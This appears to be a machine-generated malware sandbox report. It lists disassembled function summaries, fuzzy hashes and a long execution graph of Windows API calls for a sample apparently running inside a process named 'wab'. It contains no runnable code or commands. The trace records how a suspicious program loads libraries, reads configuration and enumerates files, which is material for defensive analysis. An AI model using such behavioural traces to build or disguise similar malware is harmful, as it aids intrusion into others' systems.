                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcatlstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1475610065-0
                                                                                                                                                                                                                    • Opcode ID: ecf0be7fd0091e9725c1a43faea9f3839ef2fb2c714a302b002f5536aa9768ee
                                                                                                                                                                                                                    • Instruction ID: bf3566e131109b1052b746e835dd5f2d09b7a47dabc9e12c4f5ea4c5e6c8b2c8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecf0be7fd0091e9725c1a43faea9f3839ef2fb2c714a302b002f5536aa9768ee
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75219836A00244ABD7049B54DC84EFEB7F8EF88721F64801AE514BB181EF74A54687A5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D7153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 352D715C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 352D717F
                                                                                                                                                                                                                      • Part of subcall function 352D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 352D5702
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 352D71A5
                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 352D71C7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1794362364-0
                                                                                                                                                                                                                    • Opcode ID: a3146b4614ff39dae220b0eb9c03f0f01f9bad40b74cfdae2db9283721c220df
                                                                                                                                                                                                                    • Instruction ID: 3758e3b4dd71042753e843524f0a3780934915aa54436f9e45a85dd075e81490
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3146b4614ff39dae220b0eb9c03f0f01f9bad40b74cfdae2db9283721c220df
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E01F076B15A16BF231106B65C4CE7BEEFDEEC2AA13550219BC26D7240EE64CC0281B0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,352D1D66,00000000,00000000,?,352D5C88,352D1D66,00000000,00000000,00000000,?,352D5E85,00000006,FlsSetValue), ref: 352D5D13
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,352D5C88,352D1D66,00000000,00000000,00000000,?,352D5E85,00000006,FlsSetValue,352DE190,FlsSetValue,00000000,00000364,?,352D5BC8), ref: 352D5D1F
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,352D5C88,352D1D66,00000000,00000000,00000000,?,352D5E85,00000006,FlsSetValue,352DE190,FlsSetValue,00000000), ref: 352D5D2D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                    • Opcode ID: 2e043396526d545b5f6b48d17d101ccad6e0e71e60f165ee07f580de7a593766
                                                                                                                                                                                                                    • Instruction ID: 28d8775267dbd472f76bd16b2a3e5d6d716e036aaf338b5de34674901ed30a8b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e043396526d545b5f6b48d17d101ccad6e0e71e60f165ee07f580de7a593766
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C017536B65726AFD7114A68DC4CE46BBD9AF457F2B510620E92AE7180DFA0D402C6F0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D69F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,352D6C7C,?), ref: 352D6A1E
                                                                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,352D6C7C,?), ref: 352D6A35
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: |l-5
                                                                                                                                                                                                                    • API String ID: 0-939093168
                                                                                                                                                                                                                    • Opcode ID: aebf2a82413b4c77c25df62970d49ccebc0a82b210ed542c404ab93b8d2b534b
                                                                                                                                                                                                                    • Instruction ID: 90ddb277ea3df398987ceebaba902b4b0071e9a80917e09f068ba4096985f7a0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aebf2a82413b4c77c25df62970d49ccebc0a82b210ed542c404ab93b8d2b534b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03C30924609CBE700EBA4D448B6CBBB1BB4033AF649384E4789A1D1DFB669468B81
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:7.2%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:8.7%
                                                                                                                                                                                                                    Signature Coverage:1%
                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                    Total number of Limit Nodes:74
                                                                                                                                                                                                                    execution_graph 40842 441819 40845 430737 40842->40845 40844 441825 40846 430756 40845->40846 40856 43076d 40845->40856 40847 430774 40846->40847 40848 43075f 40846->40848 40850 43034a memcpy 40847->40850 40859 4169a7 11 API calls 40848->40859 40853 43077e 40850->40853 40851 4307ce 40852 430819 memset 40851->40852 40854 415b2c 11 API calls 40851->40854 40852->40856 40853->40851 40853->40856 40857 4307fa 40853->40857 40855 4307e9 40854->40855 40855->40852 40855->40856 40856->40844 40860 4169a7 11 API calls 40857->40860 40859->40856 40860->40856 37680 442ec6 19 API calls 37857 4152c6 malloc 37858 4152e2 37857->37858 37859 4152ef 37857->37859 37861 416760 11 API calls 37859->37861 37861->37858 37864 4232e8 37865 4232ef 37864->37865 37868 415b2c 37865->37868 37867 423305 37869 415b42 37868->37869 37874 415b46 37868->37874 37870 415b94 37869->37870 37871 415b5a 37869->37871 37869->37874 37875 4438b5 37870->37875 37873 415b79 memcpy 37871->37873 37871->37874 37873->37874 37874->37867 37876 4438d0 37875->37876 37884 4438c9 37875->37884 37889 415378 memcpy memcpy 37876->37889 37884->37874 38530 4466f4 38549 446904 38530->38549 38532 446700 GetModuleHandleA 38535 446710 __set_app_type __p__fmode __p__commode 38532->38535 38534 4467a4 38536 4467ac __setusermatherr 38534->38536 38537 4467b8 38534->38537 38535->38534 38536->38537 38550 4468f0 _controlfp 38537->38550 38539 4467bd _initterm __wgetmainargs _initterm 38541 44681e GetStartupInfoW 38539->38541 38542 446810 38539->38542 38543 446866 GetModuleHandleA 38541->38543 38551 41276d 38543->38551 38547 446896 exit 38548 44689d _cexit 38547->38548 38548->38542 38549->38532 38550->38539 38552 41277d 38551->38552 38594 4044a4 LoadLibraryW 38552->38594 38554 412785 38586 412789 38554->38586 38602 414b81 38554->38602 38557 4127c8 38608 412465 memset ??2@YAPAXI 38557->38608 38559 4127ea 38620 40ac21 38559->38620 38564 412813 38638 40dd07 memset 38564->38638 38565 412827 38643 40db69 memset 38565->38643 38568 412822 38664 4125b6 ??3@YAXPAX 38568->38664 38570 40ada2 _wcsicmp 38571 41283d 38570->38571 38571->38568 38574 412863 CoInitialize 38571->38574 38648 41268e 38571->38648 38668 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38574->38668 38578 41296f 38670 40b633 38578->38670 38581 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38585 412957 38581->38585 38591 4128ca 38581->38591 38585->38568 38586->38547 38586->38548 38587 4128d0 TranslateAcceleratorW 38588 412941 GetMessageW 38587->38588 38587->38591 38588->38585 38588->38587 38589 412909 IsDialogMessageW 38589->38588 38589->38591 38590 4128fd IsDialogMessageW 38590->38588 38590->38589 38591->38587 38591->38589 38591->38590 38592 41292b TranslateMessage DispatchMessageW 38591->38592 38593 41291f IsDialogMessageW 38591->38593 38592->38588 38593->38588 38593->38592 38595 4044cf GetProcAddress 38594->38595 38598 4044f7 38594->38598 38596 4044e8 FreeLibrary 38595->38596 38599 4044df 38595->38599 38597 4044f3 38596->38597 38596->38598 38597->38598 38600 404507 MessageBoxW 38598->38600 38601 40451e 38598->38601 38599->38596 38600->38554 38601->38554 38603 414b8a 38602->38603 38604 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38602->38604 38674 40a804 memset 38603->38674 38604->38557 38607 414b9e GetProcAddress 38607->38604 38610 4124e0 38608->38610 38609 412505 ??2@YAPAXI 38611 41251c 38609->38611 38613 412521 38609->38613 38610->38609 38696 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38611->38696 38685 444722 38613->38685 38619 41259b wcscpy 38619->38559 38701 40b1ab ??3@YAXPAX ??3@YAXPAX 38620->38701 38624 40ad4b 38633 40ad76 38624->38633 38725 40a9ce 38624->38725 38625 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38631 40ac5c 38625->38631 38627 40ace7 ??3@YAXPAX 38627->38631 38631->38624 38631->38625 38631->38627 38631->38633 38705 40a8d0 38631->38705 38717 4099f4 38631->38717 38632 40a8d0 7 API calls 38632->38633 38702 40aa04 38633->38702 38634 40ada2 38635 40adc9 38634->38635 38636 40adaa 38634->38636 38635->38564 38635->38565 38636->38635 38637 40adb3 _wcsicmp 38636->38637 38637->38635 38637->38636 38730 40dce0 38638->38730 38640 40dd3a GetModuleHandleW 38735 40dba7 38640->38735 38644 40dce0 3 API calls 38643->38644 38645 40db99 38644->38645 38807 40dae1 38645->38807 38821 402f3a 38648->38821 38650 412766 38650->38568 38650->38574 38651 4126d3 _wcsicmp 38652 4126a8 38651->38652 38652->38650 38652->38651 38654 41270a 38652->38654 38857 4125f8 7 API calls 38652->38857 38654->38650 38824 411ac5 38654->38824 38665 4125da 38664->38665 38666 4125f0 38665->38666 38667 4125e6 DeleteObject 38665->38667 38669 40b1ab ??3@YAXPAX ??3@YAXPAX 38666->38669 38667->38666 38668->38581 38669->38578 38671 40b640 38670->38671 38672 40b639 ??3@YAXPAX 38670->38672 38673 40b1ab ??3@YAXPAX ??3@YAXPAX 38671->38673 38672->38671 38673->38586 38675 40a83b GetSystemDirectoryW 38674->38675 38676 40a84c wcscpy 38674->38676 38675->38676 38681 409719 wcslen 38676->38681 38679 40a881 LoadLibraryW 38680 40a886 38679->38680 38680->38604 38680->38607 38682 409724 38681->38682 38683 409739 wcscat LoadLibraryW 38681->38683 38682->38683 38684 40972c wcscat 38682->38684 38683->38679 38683->38680 38684->38683 38686 444732 38685->38686 38687 444728 DeleteObject 38685->38687 38697 409cc3 38686->38697 38687->38686 38689 412551 38690 4010f9 38689->38690 38691 401130 38690->38691 38692 401134 GetModuleHandleW LoadIconW 38691->38692 38693 401107 wcsncat 38691->38693 38694 40a7be 38692->38694 38693->38691 38695 40a7d2 38694->38695 38695->38619 38695->38695 38696->38613 38700 409bfd memset wcscpy 38697->38700 38699 409cdb CreateFontIndirectW 38699->38689 38700->38699 38701->38631 38703 40aa14 38702->38703 38704 40aa0a ??3@YAXPAX 38702->38704 38703->38634 38704->38703 38706 40a8eb 38705->38706 38707 40a8df wcslen 38705->38707 38708 40a906 ??3@YAXPAX 38706->38708 38709 40a90f 38706->38709 38707->38706 38710 40a919 38708->38710 38711 4099f4 3 API calls 38709->38711 38712 40a932 38710->38712 38713 40a929 ??3@YAXPAX 38710->38713 38711->38710 38715 4099f4 3 API calls 38712->38715 38714 40a93e memcpy 38713->38714 38714->38631 38716 40a93d 38715->38716 38716->38714 38718 409a41 38717->38718 38719 4099fb malloc 38717->38719 38718->38631 38721 409a37 38719->38721 38722 409a1c 38719->38722 38721->38631 38723 409a30 ??3@YAXPAX 38722->38723 38724 409a20 memcpy 38722->38724 38723->38721 38724->38723 38726 40a9e7 38725->38726 38727 40a9dc ??3@YAXPAX 38725->38727 38729 4099f4 3 API calls 38726->38729 38728 40a9f2 38727->38728 38728->38632 38729->38728 38754 409bca GetModuleFileNameW 38730->38754 38732 40dce6 wcsrchr 38733 40dcf5 38732->38733 38734 40dcf9 wcscat 38732->38734 38733->38734 38734->38640 38755 44db70 38735->38755 38739 40dbfd 38758 4447d9 38739->38758 38742 40dc34 wcscpy wcscpy 38784 40d6f5 38742->38784 38743 40dc1f wcscpy 38743->38742 38746 40d6f5 3 API calls 38747 40dc73 38746->38747 38748 40d6f5 3 API calls 38747->38748 38749 40dc89 38748->38749 38750 40d6f5 3 API calls 38749->38750 38751 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38750->38751 38790 40da80 38751->38790 38754->38732 38756 40dbb4 memset memset 38755->38756 38757 409bca GetModuleFileNameW 38756->38757 38757->38739 38760 4447f4 38758->38760 38759 40dc1b 38759->38742 38759->38743 38760->38759 38761 444807 ??2@YAPAXI 38760->38761 38762 44481f 38761->38762 38763 444873 _snwprintf 38762->38763 38764 4448ab wcscpy 38762->38764 38797 44474a 8 API calls 38763->38797 38766 4448bb 38764->38766 38798 44474a 8 API calls 38766->38798 38767 4448a7 38767->38764 38767->38766 38769 4448cd 38799 44474a 8 API calls 38769->38799 38771 4448e2 38800 44474a 8 API calls 38771->38800 38773 4448f7 38801 44474a 8 API calls 38773->38801 38775 44490c 38802 44474a 8 API calls 38775->38802 38777 444921 38803 44474a 8 API calls 38777->38803 38779 444936 38804 44474a 8 API calls 38779->38804 38781 44494b 38805 44474a 8 API calls 38781->38805 38783 444960 ??3@YAXPAX 38783->38759 38785 44db70 38784->38785 38786 40d702 memset GetPrivateProfileStringW 38785->38786 38787 40d752 38786->38787 38788 40d75c WritePrivateProfileStringW 38786->38788 38787->38788 38789 40d758 38787->38789 38788->38789 38789->38746 38791 44db70 38790->38791 38792 40da8d memset 38791->38792 38793 40daac LoadStringW 38792->38793 38794 40dac6 38793->38794 38794->38793 38796 40dade 38794->38796 38806 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38794->38806 38796->38568 38797->38767 38798->38769 38799->38771 38800->38773 38801->38775 38802->38777 38803->38779 38804->38781 38805->38783 38806->38794 38817 409b98 GetFileAttributesW 38807->38817 38809 40daea 38810 40db63 38809->38810 38811 40daef wcscpy wcscpy GetPrivateProfileIntW 38809->38811 38810->38570 38818 40d65d GetPrivateProfileStringW 38811->38818 38813 40db3e 38819 40d65d GetPrivateProfileStringW 38813->38819 38815 40db4f 38820 40d65d GetPrivateProfileStringW 38815->38820 38817->38809 38818->38813 38819->38815 38820->38810 38858 40eaff 38821->38858 38825 411ae2 memset 38824->38825 38826 411b8f 38824->38826 38898 409bca GetModuleFileNameW 38825->38898 38838 411a8b 38826->38838 38828 411b0a wcsrchr 38829 411b22 wcscat 38828->38829 38830 411b1f 38828->38830 38899 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38829->38899 38830->38829 38832 411b67 38900 402afb 38832->38900 38836 411b7f 38839 402afb 27 API calls 38838->38839 38840 411ac0 38839->38840 38841 4110dc 38840->38841 38842 41113e 38841->38842 38847 4110f0 38841->38847 38981 40969c LoadCursorW SetCursor 38842->38981 38844 411143 38854 40b633 ??3@YAXPAX 38844->38854 38982 40b1ab ??3@YAXPAX ??3@YAXPAX 38844->38982 38983 4032b4 38844->38983 39001 444a54 38844->39001 38845 4110f7 _wcsicmp 38845->38847 38846 411157 38848 40ada2 _wcsicmp 38846->38848 38847->38842 38847->38845 39004 410c46 10 API calls 38847->39004 38851 411167 38848->38851 38849 4111af 38851->38849 38852 4111a6 qsort 38851->38852 38852->38849 38854->38846 38857->38652 38859 40eb10 38858->38859 38871 40e8e0 38859->38871 38862 40eb6c memcpy memcpy 38869 40ebb7 38862->38869 38863 40ebf2 ??2@YAPAXI ??2@YAPAXI 38865 40ec2e ??2@YAPAXI 38863->38865 38867 40ec65 38863->38867 38864 40d134 16 API calls 38864->38869 38865->38867 38867->38867 38881 40ea7f 38867->38881 38869->38862 38869->38863 38869->38864 38870 402f49 38870->38652 38872 40e8f2 38871->38872 38873 40e8eb ??3@YAXPAX 38871->38873 38874 40e900 38872->38874 38875 40e8f9 ??3@YAXPAX 38872->38875 38873->38872 38876 40e911 38874->38876 38877 40e90a ??3@YAXPAX 38874->38877 38875->38874 38878 40e931 ??2@YAPAXI ??2@YAPAXI 38876->38878 38879 40e921 ??3@YAXPAX 38876->38879 38880 40e92a ??3@YAXPAX 38876->38880 38877->38876 38878->38862 38879->38880 38880->38878 38882 40aa04 ??3@YAXPAX 38881->38882 38883 40ea88 38882->38883 38884 40aa04 ??3@YAXPAX 38883->38884 38885 40ea90 38884->38885 38886 40aa04 ??3@YAXPAX 38885->38886 38887 40ea98 38886->38887 38888 40aa04 ??3@YAXPAX 38887->38888 38889 40eaa0 38888->38889 38890 40a9ce 4 API calls 38889->38890 38891 40eab3 38890->38891 38892 40a9ce 4 API calls 38891->38892 38893 40eabd 38892->38893 38894 40a9ce 4 API calls 38893->38894 38895 40eac7 38894->38895 38896 40a9ce 4 API calls 38895->38896 38897 40ead1 38896->38897 38897->38870 38898->38828 38899->38832 38957 40b2cc 38900->38957 38902 402b0a 38903 40b2cc 27 API calls 38902->38903 38904 402b23 38903->38904 38905 40b2cc 27 API calls 38904->38905 38906 402b3a 38905->38906 38907 40b2cc 27 API calls 38906->38907 38908 402b54 38907->38908 38909 40b2cc 27 API calls 38908->38909 38910 402b6b 38909->38910 38911 40b2cc 27 API calls 38910->38911 38912 402b82 38911->38912 38913 40b2cc 27 API calls 38912->38913 38914 402b99 38913->38914 38915 40b2cc 27 API calls 38914->38915 38916 402bb0 38915->38916 38917 40b2cc 27 API calls 38916->38917 38918 402bc7 38917->38918 38919 40b2cc 27 API calls 38918->38919 38920 402bde 38919->38920 38921 40b2cc 27 API calls 38920->38921 38922 402bf5 38921->38922 38923 40b2cc 27 API calls 38922->38923 38924 402c0c 38923->38924 38925 40b2cc 27 API calls 38924->38925 38926 402c23 38925->38926 38927 40b2cc 27 API calls 38926->38927 38928 402c3a 38927->38928 38929 40b2cc 27 API calls 38928->38929 38930 402c51 38929->38930 38931 40b2cc 27 API calls 38930->38931 38932 402c68 38931->38932 38933 40b2cc 27 API calls 38932->38933 38934 402c7f 38933->38934 38935 40b2cc 27 API calls 38934->38935 38936 402c99 38935->38936 38937 40b2cc 27 API calls 38936->38937 38938 402cb3 38937->38938 38939 40b2cc 27 API calls 38938->38939 38940 402cd5 38939->38940 38941 40b2cc 27 API calls 38940->38941 38942 402cf0 38941->38942 38943 40b2cc 27 API calls 38942->38943 38944 402d0b 38943->38944 38945 40b2cc 27 API calls 38944->38945 38946 402d26 38945->38946 38947 40b2cc 27 API calls 38946->38947 38948 402d3e 38947->38948 38949 40b2cc 27 API calls 38948->38949 38950 402d59 38949->38950 38951 40b2cc 27 API calls 38950->38951 38952 402d78 38951->38952 38953 40b2cc 27 API calls 38952->38953 38954 402d93 38953->38954 38955 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38954->38955 38955->38836 38960 40b58d 38957->38960 38959 40b2d1 38959->38902 38961 40b5a4 GetModuleHandleW FindResourceW 38960->38961 38962 40b62e 38960->38962 38963 40b5c2 LoadResource 38961->38963 38965 40b5e7 38961->38965 38962->38959 38964 40b5d0 SizeofResource LockResource 38963->38964 38963->38965 38964->38965 38965->38962 38973 40afcf 38965->38973 38967 40b608 memcpy 38976 40b4d3 memcpy 38967->38976 38969 40b61e 38977 40b3c1 18 API calls 38969->38977 38971 40b626 38978 40b04b 38971->38978 38974 40b04b ??3@YAXPAX 38973->38974 38975 40afd7 ??2@YAPAXI 38974->38975 38975->38967 38976->38969 38977->38971 38979 40b051 ??3@YAXPAX 38978->38979 38980 40b05f 38978->38980 38979->38980 38980->38962 38981->38844 38982->38846 38984 4032c4 38983->38984 38985 40b633 ??3@YAXPAX 38984->38985 38986 403316 38985->38986 39005 44553b 38986->39005 38990 403480 39201 40368c 15 API calls 38990->39201 38992 403489 38993 40b633 ??3@YAXPAX 38992->38993 38994 403495 38993->38994 38994->38846 38995 4033a9 memset memcpy 38996 4033ec wcscmp 38995->38996 38997 40333c 38995->38997 38996->38997 38997->38990 38997->38995 38997->38996 39199 4028e7 11 API calls 38997->39199 39200 40f508 6 API calls 38997->39200 38999 403421 _wcsicmp 38999->38997 39002 444a64 FreeLibrary 39001->39002 39003 444a83 39001->39003 39002->39003 39003->38846 39004->38847 39006 445548 39005->39006 39007 445599 39006->39007 39202 40c768 39006->39202 39008 4455a8 memset 39007->39008 39015 4457f2 39007->39015 39285 403988 39008->39285 39018 445854 39015->39018 39387 403e2d memset memset memset memset memset 39015->39387 39016 4458bb memset memset 39022 414c2e 16 API calls 39016->39022 39068 4458aa 39018->39068 39410 403c9c memset memset memset memset memset 39018->39410 39020 44595e memset memset 39028 414c2e 16 API calls 39020->39028 39021 4455e5 39025 445672 39021->39025 39031 44560f 39021->39031 39023 4458f9 39022->39023 39029 40b2cc 27 API calls 39023->39029 39296 403fbe memset memset memset memset memset 39025->39296 39026 445a00 memset memset 39433 414c2e 39026->39433 39027 445b22 39033 445bca 39027->39033 39034 445b38 memset memset memset 39027->39034 39038 44599c 39028->39038 39039 445909 39029->39039 39042 4087b3 338 API calls 39031->39042 39032 445849 39497 40b1ab ??3@YAXPAX ??3@YAXPAX 39032->39497 39040 445c8b memset memset 39033->39040 39107 445cf0 39033->39107 39043 445bd4 39034->39043 39044 445b98 39034->39044 39047 40b2cc 27 API calls 39038->39047 39048 409d1f 6 API calls 39039->39048 39051 414c2e 16 API calls 39040->39051 39041 44589f 39498 40b1ab ??3@YAXPAX ??3@YAXPAX 39041->39498 39049 445621 39042->39049 39057 414c2e 16 API calls 39043->39057 39044->39043 39053 445ba2 39044->39053 39050 4459ac 39047->39050 39061 445919 39048->39061 39483 4454bf 20 API calls 39049->39483 39063 409d1f 6 API calls 39050->39063 39064 445cc9 39051->39064 39571 4099c6 wcslen 39053->39571 39056 40b2cc 27 API calls 39069 445a4f 39056->39069 39071 445be2 39057->39071 39058 403335 39198 4452e5 45 API calls 39058->39198 39059 445d3d 39091 40b2cc 27 API calls 39059->39091 39060 445d88 memset memset memset 39074 414c2e 16 API calls 39060->39074 39499 409b98 GetFileAttributesW 39061->39499 39062 445823 39062->39032 39073 4087b3 338 API calls 39062->39073 39075 4459bc 39063->39075 39076 409d1f 6 API calls 39064->39076 39066 445879 39066->39041 39087 4087b3 338 API calls 39066->39087 39068->39016 39092 44594a 39068->39092 39448 409d1f wcslen wcslen 39069->39448 39080 40b2cc 27 API calls 39071->39080 39073->39062 39084 445dde 39074->39084 39567 409b98 GetFileAttributesW 39075->39567 39086 445ce1 39076->39086 39077 445bb3 39574 445403 memset 39077->39574 39081 445bf3 39080->39081 39090 409d1f 6 API calls 39081->39090 39082 445928 39082->39092 39500 40b6ef 39082->39500 39093 40b2cc 27 API calls 39084->39093 39591 409b98 GetFileAttributesW 39086->39591 39087->39066 39101 445c07 39090->39101 39102 445d54 _wcsicmp 39091->39102 39092->39020 39106 4459ed 39092->39106 39105 445def 39093->39105 39094 4459cb 39094->39106 39115 40b6ef 252 API calls 39094->39115 39098 40b2cc 27 API calls 39099 445a94 39098->39099 39453 40ae18 39099->39453 39100 44566d 39100->39015 39370 413d4c 39100->39370 39111 445389 258 API calls 39101->39111 39112 445d71 39102->39112 39177 445d67 39102->39177 39104 445665 39484 40b1ab ??3@YAXPAX ??3@YAXPAX 39104->39484 39113 409d1f 6 API calls 39105->39113 39106->39026 39106->39027 39107->39058 39107->39059 39107->39060 39108 445389 258 API calls 39108->39033 39117 445c17 39111->39117 39592 445093 23 API calls 39112->39592 39120 445e03 39113->39120 39115->39106 39116 4456d8 39122 40b2cc 27 API calls 39116->39122 39123 40b2cc 27 API calls 39117->39123 39119 44563c 39119->39104 39125 4087b3 338 API calls 39119->39125 39593 409b98 GetFileAttributesW 39120->39593 39121 40b6ef 252 API calls 39121->39058 39127 4456e2 39122->39127 39128 445c23 39123->39128 39124 445d83 39124->39058 39125->39119 39486 413fa6 _wcsicmp _wcsicmp 39127->39486 39132 409d1f 6 API calls 39128->39132 39130 445e12 39137 445e6b 39130->39137 39143 40b2cc 27 API calls 39130->39143 39135 445c37 39132->39135 39133 445aa1 39136 445b17 39133->39136 39151 445ab2 memset 39133->39151 39164 409d1f 6 API calls 39133->39164 39460 40add4 39133->39460 39465 445389 39133->39465 39474 40ae51 39133->39474 39134 4456eb 39139 4456fd memset memset memset memset 39134->39139 39140 4457ea 39134->39140 39141 445389 258 API calls 39135->39141 39568 40aebe 39136->39568 39595 445093 23 API calls 39137->39595 39487 409c70 wcscpy wcsrchr 39139->39487 39490 413d29 39140->39490 39146 445c47 39141->39146 39147 445e33 39143->39147 39153 40b2cc 27 API calls 39146->39153 39154 409d1f 6 API calls 39147->39154 39149 445e7e 39150 445f67 39149->39150 39159 40b2cc 27 API calls 39150->39159 39155 40b2cc 27 API calls 39151->39155 39157 445c53 39153->39157 39158 445e47 39154->39158 39155->39133 39161 409d1f 6 API calls 39157->39161 39594 409b98 GetFileAttributesW 39158->39594 39163 445f73 39159->39163 39166 445c67 39161->39166 39168 409d1f 6 API calls 39163->39168 39164->39133 39170 445389 258 API calls 39166->39170 39167 445e56 39167->39137 39173 445e83 memset 39167->39173 39171 445f87 39168->39171 39170->39033 39598 409b98 GetFileAttributesW 39171->39598 39175 40b2cc 27 API calls 39173->39175 39178 445eab 39175->39178 39177->39058 39177->39121 39180 409d1f 6 API calls 39178->39180 39182 445ebf 39180->39182 39184 40ae18 9 API calls 39182->39184 39194 445ef5 39184->39194 39187 40ae51 9 API calls 39187->39194 39189 445f5c 39191 40aebe FindClose 39189->39191 39190 40add4 2 API calls 39190->39194 39191->39150 39192 40b2cc 27 API calls 39192->39194 39193 409d1f 6 API calls 39193->39194 39194->39187 39194->39189 39194->39190 39194->39192 39194->39193 39196 445f3a 39194->39196 39596 409b98 GetFileAttributesW 39194->39596 39597 445093 23 API calls 39196->39597 39198->38997 39199->38999 39200->38997 39201->38992 39203 40c775 39202->39203 39599 40b1ab ??3@YAXPAX ??3@YAXPAX 39203->39599 39205 40c788 39600 40b1ab ??3@YAXPAX ??3@YAXPAX 39205->39600 39207 40c790 39601 40b1ab ??3@YAXPAX ??3@YAXPAX 39207->39601 39209 40c798 39210 40aa04 ??3@YAXPAX 39209->39210 39211 40c7a0 39210->39211 39602 40c274 memset 39211->39602 39216 40a8ab 9 API calls 39217 40c7c3 39216->39217 39218 40a8ab 9 API calls 39217->39218 39219 40c7d0 39218->39219 39631 40c3c3 39219->39631 39223 40c7e5 39286 40399d 39285->39286 39929 403a16 39286->39929 39288 403a09 39943 40b1ab 